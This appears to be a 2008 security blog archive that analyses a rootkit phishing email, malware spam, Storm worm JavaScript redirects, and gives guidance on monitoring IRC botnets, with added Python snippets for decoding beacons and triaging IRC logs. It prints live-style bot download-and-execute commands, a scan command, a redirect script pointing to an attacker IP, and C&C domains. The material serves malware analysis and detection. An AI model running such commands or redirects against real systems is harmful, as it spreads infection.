Friday, September 12, 2008

Your Internet access is going to get suspended. - Once you install that rootkit.

Many people have received an email:
Your internet access is going to get suspended

The Internet Service Provider Consorcium was made to protect the rights of software authors, artists.
We conduct regular wiretapping on our networks, to monitor criminal acts.

We are aware of your illegal activities on the internet wich were originating from

You can check the report of your activities in the past 6 month that we have attached. We strongly advise you to stop your activities regarding the illegal downloading of copyrighted material of your internet access will be suspended.

Sincerely
ICS Monitoring Team
Attached is a zip file, in my case user-EA49943X-activities.zip.

MD5s:
6ba40e29db8fb6f9145fde7a45708875 user-EA49943X-activities.exe
92d9f920d470e3bc12a33768893fd734 user-EA49943X-activities.zip

Once opened, the victim machine is infected with a rootkit and two seemingly random high TCP ports are opened.
The rootkit hides the presence of %system32%\cabpck.dll and %system32%\krnlcab.sys. You can check whether you're infected by opening a command prompt and typing:

type c:\windows\system32\krnlcab.sys

Unless you're infected, the response will be "The system cannot find the file specified."

Currently VirusTotal shows 22/36 AV vendors have signatures out to detect the binary. The most common signature name is Goldun (Spyware/Rootkit/Password Stealer).

The Anubis results are here.

The following registry keys are created/modified to start the rootkit on reboot:
HKLM\System\CurrentControlSet\Services\krnlcab
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\krnlcab.sys

Contact is made with either social-bos.biz or osliki.net. Snort signatures that watch for URI Content "data.php?trackid=" should catch infected hosts.

The "trackid" parameter contains a hex-encoded string like:

706172616D3D636D64266C616E673D454E552669643D30267368656C6C3D3026736F636B73706F72743D3439303532267665723D39412668747470706F72743D323638303626757074696D656D3D3726757074696D65683D30267569643D5B43374132393038313039413641363141395D

Which translates to:
param=cmd&lang=ENU&id=0&shell=0&socksport=49052&ver=9A&httpport=26806&uptimem=7&uptimeh=0&uid=[C7A2908109A6A61A9]
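As an added example (not code from the original post), here is a small Python decoder that pulls the trackid value out of a captured request line, hex-decodes it and splits the beacon into its fields, so the same pattern the Snort rule keys on can be checked in proxy or web logs. The "GET ... HTTP/1.1" framing around the hex string is constructed, and treating socksport/httpport as the two high TCP ports the rootkit opens is an assumption.

```python
import re

# Constructed sample request line; the hex value is the one quoted in the
# post, the "GET ... HTTP/1.1" framing around it is assumed.
SAMPLE_LOG = (
    "GET /data.php?trackid="
    "706172616D3D636D64266C616E673D454E552669643D30267368656C6C3D3026736F636B73706F72"
    "743D3439303532267665723D39412668747470706F72743D323638303626757074696D656D3D372675"
    "7074696D65683D30267569643D5B43374132393038313039413641363141395D"
    " HTTP/1.1"
)

# Same URI content the Snort rule watches for, followed by the hex payload.
TRACKID_RE = re.compile(r"data\.php\?trackid=([0-9A-Fa-f]+)")


def decode_trackid(hexstr):
    """Hex-decode a trackid value and split it into key=value beacon fields.
    Returns None for non-hex or non-ASCII input, so a random string that
    happens to follow the URI pattern is not reported as a beacon."""
    try:
        text = bytes.fromhex(hexstr).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return None
    fields = {}
    for pair in text.split("&"):
        key, sep, value = pair.partition("=")
        if sep:
            fields[key] = value
    return fields


def extract_beacons(log_text):
    """Find and decode every trackid beacon in captured HTTP request lines."""
    beacons = []
    for match in TRACKID_RE.finditer(log_text):
        fields = decode_trackid(match.group(1))
        if fields:
            beacons.append(fields)
    return beacons


def listening_ports(fields):
    """Ports the bot reports for its SOCKS and HTTP listeners (assumed here to
    be the two high TCP ports the post observed opening on infected hosts)."""
    ports = []
    for key in ("socksport", "httpport"):
        if fields.get(key, "").isdigit():
            ports.append(int(fields[key]))
    return sorted(ports)
```

The port list can be compared against netstat output on a suspect host to confirm the listeners the beacon advertises.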

My good friend Joel Esler from SANS ISC reported on something like this a couple of weeks ago: http://isc.sans.org/diary.html?storyid=4927.

As of 16:08 UTC 2008/9/12:

social-bos.biz has address 91.200.144.8
osliki.net has address 195.93.219.207

Technical contact for social-bos.biz:

Name: Denis Klinov
Organization: Denis LTD
Address1: Ne dom i Ne uica
City: Big city
Postal Code: 239932
Country: Russian Federation
Country Code: RU
Phone Number: +7.4955123456
Email: pavelzosimov@yandex.ru

Technical Contact for osliki.net:

Name: Anton Butov
Email: buhalovvasya@yandex.ru
Organization: Inner Tec
Address: Stroitelnaya 77 15
City: Moscow
State: Moskovskaya
ZIP: 676437
Country: RU
Phone: +7.4952176185

UPDATE: Emerging Threats has posted Snort signatures to detect infected hosts:

http://doc.emergingthreats.net/2008545

I will continue to monitor this run and report any findings.


Friday, August 22, 2008

Paris Hilton Returned By Aliens (damn!)

Occasionally my spam folder gets some really exciting messages. However, the subject of this one left me a bit disappointed.

Poor Paris - it must be really bad when even the little green men aren't interested in her.

From: "Magnus Bonnel"
To: [REDACTED]
Subject: Paris Hilton Returned By Aliens
Date: Thu, 21 Aug 2008 22:02:07 -0400
X-Mailer: Microsoft Outlook Express 6.00.2900.3138
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.3198


[image: "PLAY NOW" link]


The image would have displayed for any of you who had HTML parsing enabled within your email client. I cropped it at the chest for a "G" rating. The nipples were blurred already. If you clicked that image, you'd happily download player.exe from roskiman.com. Similar spam points to merk2web.com.ar offering stream.exe. The second version wasn't censored. An unsuspecting individual would get an eyeful of this woman's breasts (cropped for worksafe rating):



a3aec9130af6f69c715dc6eb89949079 stream.exe
a3aec9130af6f69c715dc6eb89949079 player.exe

Anubis results for the binary are available here.


Sunday, February 03, 2008

Researching your own botnets

This post is mainly for people interested in researching botnets. Many people treat botnet monitoring as a hobby. In many ways, it's almost as fun as people watching.

Section 1, the rules of behavior:

You will likely see information you should not normally be privy to. For example, keylogged data, passwords, IPs of vulnerable systems, instant messenger conversations, etc. You must not repeat any private information you see. You must not use any private information you see. You may report leaks of private information to the victim (if known) or law enforcement. Do not report such information to botnet monitoring groups, mailing lists or blogs. Remember, you too could be the victim some day. Treat the data you see with respect.

You may at some point get admin rights on the botnet; occasional hiccups happen. You must not issue any commands to disrupt the botnet or remove the drones. Issuing commands places you in the same category as the attacker, and in many countries you can be charged criminally if caught. There have been extreme cases where botnet authors replace the remove function with hostile code that causes more damage to the victim PC.

You may contact ISPs, domain registrars, and victims in attempts to get the botnet taken offline. You will likely receive the hairy eyeball, so be prepared to back up your accusations/statements with hard facts.

In some countries monitoring botnets is illegal; in others there has not yet been a ruling. Check your local laws before monitoring! Understand that you accept all risks. If you're not comfortable with this, don't read any further.

You will likely get attacked or threatened. As you learn how the botnets work, you will likely tip your hand. Everyone does. Since botnet hunting has become such an interesting hobby, there are hundreds of other people making these mistakes too. For that reason, the botnet operators (aka herders) have a keen eye and can identify snoopers quickly. In most cases you will simply be denied access to the botnet, by IP banning. In others you will be threatened by the botnet operator, or hit with denial of service attacks. This generally upsets your internet service provider, and you could risk losing internet access.

Never, ever, use proxies to snoop on botnets. If you're too chicken to do it from IP addresses you have legitimately rented, then don't track botnets. Using proxies means you're placing someone else at risk for denial of service attacks, and repeated attacks could mean they lose internet access. While there is a certain risk proxy operators take, your sloppy botnet monitoring skills should not be one of them. Dialup accounts are cheap, between 5 and 10 dollars a month in the US. Use one if you're worried about staying anonymous. Additionally, you don't know who may be intercepting proxy traffic. A proxy operator may not be as honest as you, and may use captured botnet traffic maliciously.

Section 2, Locating binaries:

For this section I turned to my old standby, SearchIRC. Using the keywords ".download http:// .exe" I was able to find:

.download http://www[dot]kartalkusculari[dot]com/oky.exe C:/oky.exe 1
Connects to:
Server: irc.webmaster.com
Port: 6667
Channel: #pert
Channel Topic: .advscan asn2 200 5 0 -r -b
Also downloads http://www[dot]freewebtown[dot]com/hidex/test.exe

.http.exe http://www[dot]freewebtown[dot]com/ssexs/mode.exe C:mode.exe 1
Connects to:
Server: irc.webchat.org
Port: 6667
Channel: #Scanall`

.scarikiamo http://www[dot]freewebtown[dot]com/n0mad/abdo.exe c:/abdo.exe 1
Connects to:
Server: f0ryou.no-ip.info
Port: 6667
Channel: ##!scanall, ##!scanallexp

Other malicious files can be found by looking through the archives at MalwareDomainList and OffensiveComputing.
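As an added example (not from the original post), a small Python triage script that turns captured channel lines like the SearchIRC hits above into structured records: the fetch command, the host serving the binary (kept defanged with "[dot]", as the post prints it) and the local drop path, plus any scan commands seen in topics. The sample lines are constructed to mirror the three hits above, and the ".advscan"/fetch syntax is matched only as it appears on this page.

```python
import re

# Constructed sample of captured channel lines, modelled on the SearchIRC
# hits in the post; URLs stay defanged with "[dot]" exactly as printed there.
SAMPLE_LINES = [
    "TOPIC #pert :.advscan asn2 200 5 0 -r -b",
    ".download http://www[dot]kartalkusculari[dot]com/oky.exe C:/oky.exe 1",
    ".http.exe http://www[dot]freewebtown[dot]com/ssexs/mode.exe C:mode.exe 1",
    ".scarikiamo http://www[dot]freewebtown[dot]com/n0mad/abdo.exe c:/abdo.exe 1",
    "<someuser> hello, is anyone here?",
]

# A fetch-and-run command: dot-prefixed verb, URL, local path, numeric flag.
FETCH_RE = re.compile(
    r"(?P<cmd>\.[\w.]+)\s+(?P<url>https?://\S+)\s+(?P<path>\S+)\s+(?P<flag>\d+)"
)
# The scan command seen in the #pert channel topic.
SCAN_RE = re.compile(r"\.advscan\b")
HOST_RE = re.compile(r"https?://([^/\s]+)")


def triage_irc_lines(lines):
    """Sort captured lines into fetch commands (with the drop host, left
    defanged) and scan commands; anything else is ignored."""
    fetches, scans = [], []
    for line in lines:
        m = FETCH_RE.search(line)
        if m:
            fetches.append({
                "command": m.group("cmd"),
                "host": HOST_RE.match(m.group("url")).group(1),
                "url": m.group("url"),
                "local_path": m.group("path"),
            })
        elif SCAN_RE.search(line):
            scans.append(line.strip())
    return {"fetches": fetches, "scans": scans}


def drop_hosts(lines):
    """Unique (defanged) hosts serving the binaries, the facts you need when
    contacting a registrar or ISP as Section 1 describes."""
    return sorted({f["host"] for f in triage_irc_lines(lines)["fetches"]})
```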

Section 3, extracting information:

Malware disassembly is an art, and something that can't be explained in a paragraph or two. However there are a few online sandboxes that will assist you as you get started botnet hunting. Anubis and CWSandbox are great. If you have time and resources to spare, investigate creating your own Truman sandnet. Once you've decided to manually reverse engineer malware, I suggest looking around OpenRCE, and attending an Assembler class at a local college.

Other useful tools for new hunters include: Process Explorer, Malcode Analysis Pack, IdaPro, OllyDbg, Cygwin, Perl and Python.

Section 4, putting it all together:

Once you've downloaded a binary, upload it to one of the free sandbox tools listed above. These tools will give pretty detailed information. If your binary's Command and Control (C&C) method is IRC, fire up Infiltrator. Using the sandbox details you should be able to set your username, nickname, and software version to mimic the bot. Connect to the botnet and log the traffic (if permitted by local laws).

Keep a journal of what you see, learn how the bot interacts with the operator. Learn the commands commonly used, and watch for additional malware as the bots are updated or moved. Note any click-fraud or denial of service attacks.

Section 5, moving on:

Computer security doesn't start or stop with botnets and malware. There are so many more things to explore and learn. Attend conferences, join local user groups and mailing lists, obtain SANS certifications. You never know what the next big thing will be. Stay cutting edge and you will enjoy everything computer security has to offer.


Thursday, November 15, 2007

Stormworm using Geocities.

The Storm authors have updated their spam templates again. The spam links to several dozen Geocities pages.

Within the Geocities pages is some pretty poorly encoded JavaScript. It decodes to a frame-buster followed by a redirect:
<script type="text/javascript">
if (top.location != location) {
    top.location.href = document.location.href;
}
window.location = "http:// 58.65.238. 36/ aes/"
</script>

(Spaces added to prevent accidental clicks)

The site opened by the JavaScript looks like this:


The links would have you download iPIX-install.exe (md5: d23355080a5c4705300a617c864df35c) which creates and runs the file %system32%\ntos.exe on each reboot.

Anubis is perhaps the best public sandbox system I've seen. Their report on this file can be found here.
